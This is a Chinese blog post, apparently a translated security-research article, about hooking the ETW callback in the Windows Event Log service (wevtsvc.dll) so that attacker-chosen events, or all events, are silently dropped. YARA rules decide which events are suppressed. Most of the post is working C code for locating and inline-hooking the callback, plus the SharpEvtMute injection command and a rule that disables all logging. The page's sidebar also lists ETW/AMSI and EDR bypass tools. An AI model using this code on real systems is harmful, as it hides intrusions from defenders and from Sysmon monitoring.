windows获取硬件设备的guid_安全研究 | YARA规则阻止Windows事件日志记录

最新推荐文章于 2023-12-05 13:18:06 发布
最新推荐文章于 2023-12-05 13:18:06 发布
阅读量230 收藏
点赞数
文章标签: windows获取硬件设备的guid

baf1bd358902c1eb49584c391f19fbb1.png

写在前面的话

事件日志搭配Windows事件转发和Sysmon,将会成为一个非常强大的安全防御方案,可以帮助研究人员检测攻击者在目标设备上的每一步非法操作。很明显,这是攻击者需要解决的问题。如果不能实现提权的话,攻击者能绕过事件日志的方式还是有限的,一旦实现提权,那结果可就不同了。

那么,怎么做才能在过滤掉攻击活动日志的同时,保留住正常的事件日志呢?

几年之前,@hlldz曾发布过一款名叫Invoke-Phant0m的工具。这是一款Windows日志清理工具,它可以找到目标事件对应的进程,然后终止掉所有通过wevtsvc.dll运行的线程。这是因为wevtsvc.dll是一个事件日志服务,因此终止它以及相关线程就可以禁用掉日志记录功能了。但是,这样将停用所有的事件日志。那么为了解决这个问题,我们需要实现Invoke-Phant0m类似的功能,但需要支持事件报告过滤,这样就可以只阻止与恶意行为相关的事件被记录了。

逆向分析事件日志服务

在对wevtsvc.dll分析的过程中,我们发现它会通过OpenTraceW来打开一个追踪会话:

af10ad148f4eeda0a5b9137b8c684273.png

OpenTraceW使用EVENT_TRACE_LOGFILEW结构体作为参数,这个结构体包含了EventRecordCallback的值,它指向目标事件的一个回调函数。

使用windbg进行深入分析后,我发现这个回调函数就是wevtsvc!EtwEventCallback:

77678a8d4801cb86ef7165f82a19b0ec.png

通过对回调函数代码进行反汇编,我发现它是一个调用了EventCallback的程序集:

9535c677f7c6a94b7fc8e9a1a6fa8619.png

在wevtsvc!EtwEventCallback上设置断点,我们就会发现它将在EVENT_RECORD结构体中接收事件信息:

typedef struct _EVENT_RECORD {  EVENT_HEADER                     EventHeader;  ETW_BUFFER_CONTEXT               BufferContext;  USHORT                           ExtendedDataCount;  USHORT                           UserDataLength;  PEVENT_HEADER_EXTENDED_DATA_ITEM ExtendedData;  PVOID                            UserData;  PVOID                            UserContext;} EVENT_RECORD, *PEVENT_RECORD;

EVENT_HEADER结构体中包含了大量事件详细信息,包括报告事件的提供方,在windbg的帮助下,我们可以获取到提供方的GUID:

0b076c4bf7ec85786510c45e9527b055.png

拿到事件提供方的GUID后,我们就可以使用logman.exe来查询提供方身份了,这里我们可以看到提供方就是Microsoft-Windows-Sysmon:

399f4845ebeb6efdef3d8397ae535d8c.png

我们可以在这里通过添加一个ret命令来篡改该函数,并阻止所有的事件报告生成:

08b9f2437f85bcd514a10605fb2df28b.png

在下图中,你可以看到我清楚掉了一条7:01创建的事件日志,并在7:04时添加了一个新用户,但是这个操作没有被记录下来,因为我们在回调函数代码中添加的ret指令能够让系统范围内的所有事件都不会被报告:

efc4902e0046c0a0440c6a620db82438.png

设置函数钩子

PoC正常执行后,我们就可以看是编写漏洞利用代码了。我们需要做的第一件事就是找到wevtsvc!EtwEventCallback的偏移量,这样我们就知道应该把函数钩子设置在哪里了。首先,我们要定位wevtsvc.dll的基地址。下面的代码可以获取该地址,并存储至dwBase变量中:

DWORD_PTR dwBase;DWORD     i, dwSizeNeeded;HMODULE   hModules[102400];TCHAR     szModule[MAX_PATH];if (EnumProcessModules(GetCurrentProcess(), hModules, sizeof(hModules), &dwSizeNeeded)){    for (int i = 0; i < (dwSizeNeeded / sizeof(HMODULE)); i++)    {        ZeroMemory((PVOID)szModule, MAX_PATH);        if (GetModuleBaseNameA(GetCurrentProcess(), hModules[i], (LPSTR)szModule, sizeof(szModule) / sizeof(TCHAR)))        {            if (!strcmp("wevtsvc.dll", (const char*)szModule))            {                dwBase = (DWORD_PTR)hModules[i];            }        }    }}

接下来,使用windbg来进行反汇编来查看回调开始时的字节位置,然后进行内存扫描,找到这些字节之后,我们也就找到了设置钩子的地方了:

29074461a79be6ce325ca89a49b5bf01.png

下面这段代码将搜索从wevtsvc.dll基地址的起始字节0xfffff,以找到4883ec384c8b0d:

#define PATTERN "\x48\x83\xec\x38\x4c\x8b\x0d"DWORD i;LPVOID lpCallbackOffset;for (i = 0; i < 0xfffff; i++){    if (!memcmp((PVOID)(dwBase + i), (unsigned char*)PATTERN, strlen(PATTERN)))    {        lpCallbackOffset = (LPVOID)(dwBase + i);    }}

获取到偏移量后,我们可以调用memcpy来拷贝字节位置:

memcpy(OriginalBytes, lpCallbackOffset, 50);接下来,设置一个钩子来将所有针对EtwEventCallback的调用重定向到EtwCallbackHook:VOID HookEtwCallback(){    DWORD oldProtect, oldOldProtect;    unsigned char boing[] = { 0x49, 0xbb, 0xde, 0xad, 0xc0, 0xde, 0xde, 0xad, 0xc0, 0xde, 0x41, 0xff, 0xe3 };    *(void **)(boing + 2) = &EtwCallbackHook;    VirtualProtect(lpCallbackOffset, 13, PAGE_EXECUTE_READWRITE, &oldProtect);    memcpy(lpCallbackOffset, boing, sizeof(boing));    VirtualProtect(lpCallbackOffset, 13, oldProtect, &oldOldProtect);    return;}

但是,如果想要报告那些我们不需要阻止的事件,我们就需要恢复原先的回调执行了,因此我们还需要在它报告合法事件之后,重新设置钩子,以便捕捉后续事件。这里我们可以使用一个typedef来实现:

t

ypedef VOID(WINAPI * EtwEventCallback_) (EVENT_RECORD *EventRecord);VOID DoOriginalEtwCallback( EVENT_RECORD *EventRecord ){    DWORD dwOldProtect;    VirtualProtect(lpCallbackOffset, sizeof(OriginalBytes), PAGE_EXECUTE_READWRITE, &dwOldProtect);    memcpy(lpCallbackOffset, OriginalBytes, sizeof(OriginalBytes));    VirtualProtect(lpCallbackOffset, sizeof(OriginalBytes), dwOldProtect, &dwOldProtect);    EtwEventCallback_ EtwEventCallback = (EtwEventCallback_)lpCallbackOffset;    EtwEventCallback(EventRecord);    HookEtwCallback();}

完成上述操作之后,我们就能够找到ETW回调函数的偏移量,然后将其挂钩到我们自己的函数并解析数据,最终解除回调并报告事件。

我们可以在windbg中看到解析后的事件:

9cf0d09ae206fc896381bba521eeb6eb.png

YARA与模式匹配

接下来,我们就要实现日志过滤器了。在这里,我定义了下列宏来保持代码风格一致性:

c3eb505593f88a3e8e90b3afd86196a9.png

下面的代码将创建一个YARA规则中对象,并在YRRulesScanMem中使用:

#define RULE_ALLOW_ALL "rule Allow { condition: false }"YRInitalize();RtlCopyMemory(cRule, RULE_ALLOW_ALL, strlen(RULE_ALLOW_ALL));if (YRCompilerCreate(&yrCompiler) != ERROR_SUCCESS){  return -1;}if (YRCompilerAddString(yrCompiler, cRule, NULL) != ERROR_SUCCESS){  return -1;}YRCompilerGetRules(yrCompiler, &yrRules);

YARA规则写好后,我们就可以开始扫描内存了。下面我们会扫描包含格式化事件内容的StringBuffer变量,并将结果传递给YARA回调函数ToReportOrNotToReportThatIsTheQuestion。该函数将根据规则是否匹配而将dwReport变量设置为0或1。如果PIPE_NAME变量出现在事件中,还需要对其进行检查。因为EvtMuteHook.dll将使用一个命名管道来动态更新当前规则,这将会生成事件日志,所以这个检查将确保这些事件日志不会被报告:

INT ToReportOrNotToReportThatIsTheQuestion( YR_SCAN_CONTEXT* Context,    INT Message,    PVOID pMessageData,    PVOID pUserData){    if (Message == CALLBACK_MSG_RULE_MATCHING)    {        (*(int*)pUserData) = 1;    }    if (Message == CALLBACK_MSG_RULE_NOT_MATCHING)    {        (*(int*)pUserData) = 0;    }    return CALLBACK_CONTINUE;}YRRulesScanMem(yrRules, (uint8_t*)StringBuffer, strlen(StringBuffer), 0, ToReportOrNotToReportThatIsTheQuestion, &dwReport, 0);if (dwReport == 0){    if (strstr(StringBuffer, PIPE_NAME) == NULL)    {        DoOriginalEtwCallback(EventRecord);    }}

禁用所有日志记录

我们可以使用下列YARA规则来在系统范围内禁用事件日志记录:

rule disable { condition: true }

接下来,将钩子注入到事件服务中:

.\SharpEvtMute.exe --Inject

ff5c5e9b099ff91f14b8c9d54a66c612.png

设置好钩子后,还需要添加过滤器:

e966090533f24b50ec0b18f99255b89c.png

现在,所有的事件都不会被记录。

d884f95b79fac83f41a28cb18f0451ab.gif

精彩推荐

e4b248a5f7e1e2514978ec63cea533f2.png 9512f122b486ba4cb3bf8baa0cf731b7.png 71c8c77c425e30f7c6d3844271d9b39a.png

4b1af30f5e7062001d73ec4441b320bd.pnga33df216030f15f77f673e8d9a14adf0.pngbca9999ea5af88992950b4e7b1ad9c9e.png

7e6c6701272ebb3947c53853cd707055.gif

weixin_39537298
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
shortCut_cs windows快捷方式路径获取cs源码
06-11
Windows操作系统中,快捷方式是用户经常使用的功能,它提供了快速访问常用程序、文件或文件夹的方法。在编程环境中,特别是在C#开发中,有时我们需要获取这些快捷方式的路径信息以便进行更高级的操作,比如执行...
ExecuteAssembly:LoadInject .NET程序集由; 重用主机(spawnto)进程加载的CLR AppDomainManager,重载Loader.NET程序集PE DOS标头,取消链接.NET相关模块,绕过ETW + AMSI,避免通过NT静态系统调用(x64)进行EDR钩子并通过动态解析API(哈希)来隐藏导入)
03-30
描述: ExecuteAssembly是使用C / C ++构建的CS执行程序集的一种替代方法,它可用于通过以下方式加载/注入.NET程序集; 重用主机(spawnto)进程加载的CLR模块/ AppDomainManager,重载Loader / .NET程序集PE DOS标头,取消链接.NET相关模块,绕过ETW + AMSI,避免通过NT静态系统调用(x64)进行EDR钩子并通过动态解析来隐藏导入通过superfasthash哈希算法的API。 TLDR(功能): 与CLR相关的模块与PEB数据结构断开链接。 (使用MS“ ListDLLs”实用程序而不是PH进行确认) 踩踏.NET Aseembly和Reflective DLL标头(MZ字节,e_lfanew,DOS标头,富文本格式,PE标头)。 使用静态硬编码的系统调用绕过EDR挂钩。 (仅x64支持,从WinXP到Wi
如何配置WinDbg和VMware实现内核的调试
最新发布
Jeromeyoung
12-05 1242
这时启动刚才设置好的 WinDbg 快捷方式,发现很快 WinDbg 就连上虚拟机中的 Guest OS了,如果很长时间没有连接上的话, 可以单击 WinDbg 菜单中的"Debug"->“Kernel Connection”->“Resynchronize”。默认的全局调试设置中,调试类型为 Serial,调试端口为 1,波特率为 115200,这已经是我们需要的设置了。设备状态,勾选“启动时连接”,表示在开启虚拟机操作系统时,与这个虚拟设备(串口),建立连接。单击“ 完成”,按钮。
win获取网卡列表信息的三种方式
skjie的博客
07-22 1144
win获取网卡列表信息的三种方式
Windows API 获取MachineGUID
weixin_45743427的博客
05-12 2489
MachineGUID在注册表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\中。 使用WindowsAPI获取,需要用到RegOpenKeyA(),RegQueryValueExA(),和RegCloseKey()这三个函数 代码如下: #include <Windows.h> #include <string> #include <iostream> int main() { std::string sub
windows获取硬件设备guid_Windows本地提权漏洞分析(CVE20191405及CVE20191322)
weixin_39710251的博客
11-19 227
0x00 前言在本文中,我们将讨论NCC Group在分析COM本地服务时找到的两个漏洞。第一个漏洞(CVE-2019-1405)是COM服务中的一个逻辑错误,可以允许本地非特权用户以LOCAL SERVICE用户身份执行任意命令。第二个漏洞(CVE-2019-1322)属于比较简单的服务错误配置,允许本地SERVICE组中的任意用户重新配置以SYSTEM权限运行的服务(其他研究者也独立...
windows获取硬件设备guid_Windows编程技术:提权技术(下)
weixin_39876739的博客
11-28 973
前面学了“令牌权限提升”,今天来看下绕过UAC,这么多年都在讨论绕过UAC,确实也产生了许许多多的绕过方法,我们还是结合代码来看基本的方法。里面加入了一些COM接口的基本知识。 UAC(User Account Control)是微软在Windows VISTA以后版本中引入的一种安全机制,通过UAC,应用程序和任务可始终在非管理员账户的安全上下文中运行,除非特别授予管理员...
USB-device.zip_windows usb设备
09-22
标题 "USB-device.zip_windows usb设备" 涉及到的是在Windows操作系统中与USB设备进行交互的技术,特别是通过GUID来识别并操作特定的USB设备。描述中的“使用一个GUID guidHID_1查找并打开一个USB设备”指出,我们要...
GUID.zip_guid_guid 生成器
09-14
标题中的“GUID.zip_guid_guid 生成器”是一个用于创建全局唯一标识符(GUID)的工具,它模拟了Visual Studio(VS)内置的GUID生成功能。GUID,全称Globally Unique Identifier,是一种在大量分布式系统中确保每个...
guid.zip_C# guid 算法_GUID 算法_guid 代码
09-19
标签中的"c#_guid_算法 guid_算法 guid_代码"进一步强调了这个代码示例是关于`Guid`生成算法的实现。这意味着在压缩包内的`guid算法`文件很可能是C#源代码文件,里面可能包含了一个或多个自定义`Guid`生成器的类,...
VB获取系统硬件PID&VID_硬件VID_硬件PID_pidvid_VB_
10-03
标题中的"VB获取系统硬件PID&VID_硬件VID_硬件PID_pidvid_VB_"表明我们正在探讨如何使用Visual Basic(VB)编程语言来获取计算机硬件,特别是USB设备的Vendor ID (VID) 和 Product ID (PID)。这两个标识符是每个USB...
Windbg调试命令详解
Boy_Kris的专栏
02-28 2487
转载注明>> 【作者:张佩】【原文:http://www.yiiyee.cn/Blog】 1. 概述 用户成功安装微软Windows调试工具集后,能够在安装目录下发现四个调试器程序,分别是:cdb.exe、ntsd.exe、kd.exe和Windbg.exe。其中cdb.exe和ntsd.exe只能调试用户程序,Kd.exe主要用于内核调试,有时候也用于用户态调试,上述三者的一个共
《格蠹汇编》读书笔记—windbg的使用
u012138730的专栏
05-25 5314
1.注册表设置 注册表设置 要调试的exe的 debugger 为 x86的windbg 打开注册表,在[运行] (win+ R)中输入 regedit,找到下面这个路径: 比如想要调试test.exe, 就新建一个test.exe 文件夹,并新建 一个 字符串值的键,名称为 Debugger,值为 windbg所在的路径 2.打开windbg,需要设置这三个路径,但是这个...
【顶】Rootkit技术之内核钩子原理
12-02 843
      我们知道,应用程序总是离不开系统内核所提供的服务,比如它要使用内存的时候,只要跟操作系统申请就行了,而不用自己操心哪里有空闲的内存空间等问题,实际上,这些问题是由操作系统的内核来代劳的。站在黑客的角度讲,如果能够控制内核,实际上就是控制了内核之上的各种应用程序。本文将向您介绍如何建立内核级钩子来控制操作系统向上提供的各种低级功能。有了内核级钩子,我们不但能够控制、监视其他程序并过滤有关
Windows获取GUID
token2012的专栏
03-08 7754
#include "stdafx.h" #include ////////////////////////////////////////////////////////////////////////// //获取guid需要的头文件 #include #pragma comment(lib, "Rpcrt4.lib") //获取guid BOOL GetGUID(CStr
guid获取(系统下唯一标识符)
萧戈的专栏
08-09 1万+
我们经常会遇到需要一些特殊的值来指定一些特殊的变量,而且这个值要绝对的唯一。在windows下被称作GUID,其实GUID是微软对Distributed coumputing environment (DCE) universally unique identifier 的实现,而在Linux下则称作UUID。 不论它叫什么名字,表达的意愿都是一样的,以下用GUID泛指这一概念。它实际上
关于 设备安装类GUID设备接口类GUID
xiliang_pan的专栏
10-12 2万+
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class :是设备安装类GUID HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\DeviceClasses:设备接口类GUID 计算机管理属性中的信息: 以下转自:http://blog.sina.com.cn
获取硬件UUID方法(windows、linux)
热门推荐
CruiseYoung的专栏
04-30 5万+
1、命令获取uuid 1.1、windows系统中获取设备的UUID的方法: 在命令提示符下输入wmic 再输入csproduct 或 csproduct list full wmic:rootcli>csproduct list full Description=计算机系统产品 IdentifyingNumber=***** Name=***** SKUNumber= UUID=8
Windows 获取USB设备路径
05-23
可以使用Windows的管理API来获取USB设备的路径,具体方法如下: 1. 使用`SetupDiGetClassDevs`函数获取USB设备设备信息列表。 ``` HDEVINFO hDevInfo = SetupDiGetClassDevs(&GUID_DEVINTERFACE_USB_DEVICE, ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值